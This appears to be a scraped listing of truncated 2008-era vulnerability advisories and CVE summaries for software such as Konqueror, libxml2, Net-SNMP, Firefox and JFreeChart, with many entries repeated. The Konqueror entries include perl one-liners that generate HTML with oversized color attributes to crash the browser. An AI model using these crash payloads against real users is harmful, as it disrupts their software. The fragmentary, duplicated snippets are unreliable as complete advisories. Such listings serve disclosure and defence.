NTFS's HARDLINK attack-vulnerability warning-the black bar safety net

Author: MJ0011 Explosion of the old technology. explosion old art NTFS supports a HARDLINK technique, the two files“hard-wired”together, in fact, very simple principle, the two files share the same fie record, the operation of a file quite with the operation of another file, including the relevan...

konqueror-crash.txt

KDE's Konqueror & Color Attribute Love perl -e 'print "\n" . "\n"' kdie.html perl -e 'print "\n" . "\n"' kdie2.html perl -e 'print "\n" . "\n"' kdie3.html KDE's Konqueror & Color Attribute Love perl -e 'print "\n" . "\n"' kdie.html perl -e 'print "\n" . "\n"' kdie2.html perl -e 'print "\n" . "\n"...

Konqueror 3.5.9 (color/bgcolor) Multiple Remote Crash Vulnerabilities

No description provided by source. KDE's Konqueror & Color Attribute Love perl -e 'print "html\n" . "font color=" . "A" x 500000 . "\n/html"' kdie.html perl -e 'print "html\n" . "hr color=" . "A" x 500000 . "\n/html"' kdie2.html perl -e 'print "html\n" . "table bgcolor=" . "A" x 500000 . "\n/html...

Konqueror 3.5.9 - colorbgcolor Multiple Remote Crash Vulnerabilities

Konqueror 3.5.9 - colorbgcolor Multiple Remote Crash Vulnerabilities KDE's Konqueror & Color Attribute Love perl -e 'print "\n" . "\n"' kdie.html perl -e 'print "\n" . "\n"' kdie2.html perl -e 'print "\n" . "\n"' kdie3.html perl -e 'print "\n" . "\n"' kdie4.html perl -e 'print "\n" . "\n"'...

Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities

KDE's Konqueror & Color Attribute Love perl -e 'print "\n" . "\n"' kdie.html perl -e 'print "\n" . "\n"' kdie2.html perl -e 'print "\n" . "\n"' kdie3.html perl -e 'print "\n" . "\n"' kdie4.html perl -e 'print "\n" . "\n"' kdie5.html perl -e 'print "\n" . "\n"' kdie6.html perl -e 'print "\n" . "\n...

Integer overflow

Integer overflow in the MathML component in Mozilla Firefox before 2.0.0.17 and 3.x before 3.0.2, Thunderbird before 2.0.0.17, and SeaMonkey before 1.1.12 allows remote attackers to cause a denial of service memory corruption and application crash or possibly execute arbitrary code via an mtd...

BOM characters, low surrogates stripped from JavaScript before execution — Mozilla

Microsoft developer Dave Reed reported that certain BOM characters are stripped from JavaScript code before it is executed. This can lead to code, which would otherwise be treated as part of a quoted string, to be executed. The issue could potentially be used by an attacker to bypass or evade...

Fedora 9 : libHX-1.23-1.fc9 / pam_mount-0.47-1.fc9 (2008-7976)

A security flaw in the pammount's handling of user defined volumes using the 'luserconf' option has been fixed in this update. The vulnerability allowed users to arbitrarily mount filesystems at arbitrary locations. More details about this vulnerability can be found in the announcement message se...

CVE-2008-3281

libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service memory and CPU consumption via a crafted XML document...

DEBIAN-CVE-2008-3281

libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service memory and CPU consumption via a crafted XML document...

CVE-2008-3281

libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service memory and CPU consumption via a crafted XML document...

CVE-2008-3281

libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service memory and CPU consumption via a crafted XML document...

libxml2 denial of service

libxml2 2.6.32 and earlier does not properly detect recursion during entity expansion in an attribute value, which allows context-dependent attackers to cause a denial of service memory and CPU consumption via a crafted XML document...

CVE-2008-3360

Stack-based buffer overflow in the HTML parser in IntelliTamper 2.0.7 allows remote attackers to execute arbitrary code via a long URL in the HREF attribute of an A element, a different vulnerability than CVE-2006-2494...

CVE-2008-3360

Stack-based buffer overflow in the HTML parser in IntelliTamper 2.0.7 allows remote attackers to execute arbitrary code via a long URL in the HREF attribute of an A element, a different vulnerability than CVE-2006-2494...

JFreeChart: XSS vulnerabilities in the image map feature

Multiple cross-site scripting XSS vulnerabilities in the image map feature in JFreeChart 1.0.8 allow remote attackers to inject arbitrary web script or HTML via the 1 chart name or 2 chart tool tip text; or the 3 href, 4 shape, or 5 coords attribute of a chart area...

IBM AFP查看器插件SRC属性堆溢出漏洞

BUGTRAQ ID: 29932 IBM的AFP查看器插件允许用户在WEB浏览器中查看AFP文档。 AFP查看器插件在处理文档中的SRC属性时存在堆溢出漏洞，如果用户打开的文档包含有超过1023个字符的超长属性参数的话，就可以触发这个溢出，导致执行任意指令。 IBM AFP Viewer 3.2.1.1 IBM AFP Viewer 2.0.7.1 IBM --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

XSS using onerror

We had a user enter a viagra ad that actual redirected to their site. I think the offending code was here: although obviously they didn't use example.com I've attached the whole page for examination...

net-snmp: buffer overflow in perl module's Perl Module __snprint_value()

Buffer overflow in the snprintvalue function in snmpget in Net-SNMP 5.1.4, 5.2.4, and 5.4.1, as used in SNMP.xs for Perl, allows remote attackers to cause a denial of service crash and possibly execute arbitrary code via a large OCTETSTRING in an attribute value pair AVP...

PT-2008-4013 · Cre Loaded · Cre Loaded

Name of the Vulnerable Software and Affected Versions: CRE Loaded versions 6.2.13.1 and earlier Description: The issue is related to the handling of cookies over HTTPS. Specifically, the software does not set the "Secure" attribute for cookies sent over HTTPS, which could allow remote attackers t...